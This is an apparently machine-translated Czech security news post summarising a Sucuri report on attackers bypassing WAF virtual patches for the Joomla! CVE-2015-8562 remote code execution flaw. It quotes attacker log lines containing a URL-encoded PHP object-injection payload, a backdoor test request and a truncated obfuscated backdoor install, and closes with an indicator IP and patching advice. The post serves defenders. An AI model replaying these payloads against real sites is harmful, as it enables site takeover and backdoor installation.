Virtuální záplatování se ukázalo být neučínné po starém Oday zásahu webových stránek Joomla!

Téměř každé řešení WAF (Web Application Firewall) lze obejít pomocí ošemetných a sofistikovaných technik nebo jinými útočnými vektory. Blog, který publikoval Sucuri to dokonale demonstruje.

Krátký příběh: Loni jsme uvědomili o závažné zranitelnosti v Joomla! (CVE-2015–8562), která vedla ke vzdálenému spuštění PHP kódu. Exploit pro tuto zranitelnost se velmi rychle dostal na veřejnost na základě kompromitování mnoha webových stránek. Vendor vydal záplatu a mnoho majitelů webových stránek si ji nainstalovali. Někteří z nich však příliš důvěřovali technologii WAF a virtuálnímu záplatování, namísto instalace aktuální záplaty. Virtuální záplata pro tuto konkrétní zranitelnost byla rychle implementována správci WAF a všichni žili šťastně až do smrti, dokud…nebyl zaveden nový vektor útoku.

Nový přístup používal neznámý vektor pomocí „filtru vyhledávání“ volby v rámci HTTP POST požadavku namísto HTTP User-Agent hlavičky. To umožnilo obejít implementovaná WAF pravidla a úspěšně kompromitovat webové stránky bez aktualizace. Nový exploit vypadá v log souborech takto:

46.183.219.91 - - [19/Jun/2016:03:16:21 -0400]

"POST /?option=com_tags HTTP/1.1" 403 4229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"

"POSTLOG:filter-search=bigus%7D__hxsjcurrrt%7CO%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A6%3A%22assert%22%3Bs%3A10%3A%22javascript%22%3Bi%3A9999%3Bs%3A8%3A%22feed_url%22%3Bs%3A71%3A%22eval%28base64_decode%28%24_SERVER%5B%27HTTP_QGYSD%27%5D%29%29%3BJFactory%3A%3AgetConfig%28%29%3Bexit%3B%22%3B%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bi%3A1%3B%7D\xF0\xFD\xFD\xFD"

Podle šetření Sucuri hackeři zavedli “backdoor” v červnu, ale nevyužili jej až do července. Níže je uvedený příklad testu, provedený škodlivými činiteli k testování úspěšné backdoorové instalace:

46.183.219.91 - - [01/Jul/2016:04:41:20 -0400]

"POST /modules/cache.uniq_04793.php HTTP/1.1" 403 4261 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"

"POSTLOG:&php_func=assert&php=print%28%22MY_S%22.%22UCCESS%22%29%3B"

Backdoorová instalace:

46.183.219.91 - - [01/Jul/2016:09:35:27 -0400]

"POST /modules/cache.uniq_04793.php HTTP/1.1" 403 4261 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"

"POSTLOG:&php_func=assert&php=assert%28base64_decode%28str_rot13%28%27MKMuoPuvLKAyAwEsMTIwo2EyXUA0py9lo3DkZltaHHEwnaO6rJukHR52EwWWAHDlqKyZZzqHpUb5nUSDIwqEETWOHUMSHxIVI0ySoGOgDzbjJRAgAQuQZ09vpR4jJSSRLauhFwIxFmWOnH1HFUEQEx5uD1IOq3O6rJckHR9zGRb1LKSXH2SAEmO2EacGZxkWDKqjraydpIOJqUSIrJcAEmO2pIEWAUSDBIuZF011FQWOoT5YGmOJqx9gpUcnBIM6qGOkIH42JJj5oR1XH2MjZ0I1pIE5oKSHrKqjoQIdpUb4nJ5uJzyZFwI1o1I5ZT5XDJ1M….”

Doporučujeme majitelům webových stránek Joomla! Zkontrolovat jejich protokoly pro přítomnost IP adresy 46.183.219.91 vztahující se k tomuto incidentu.

Doporučujeme instalování poslední verze Joomla 3.4.6 nebo vyšší, která řeší tuto zranitelnost.

By Cybersecurity Help =)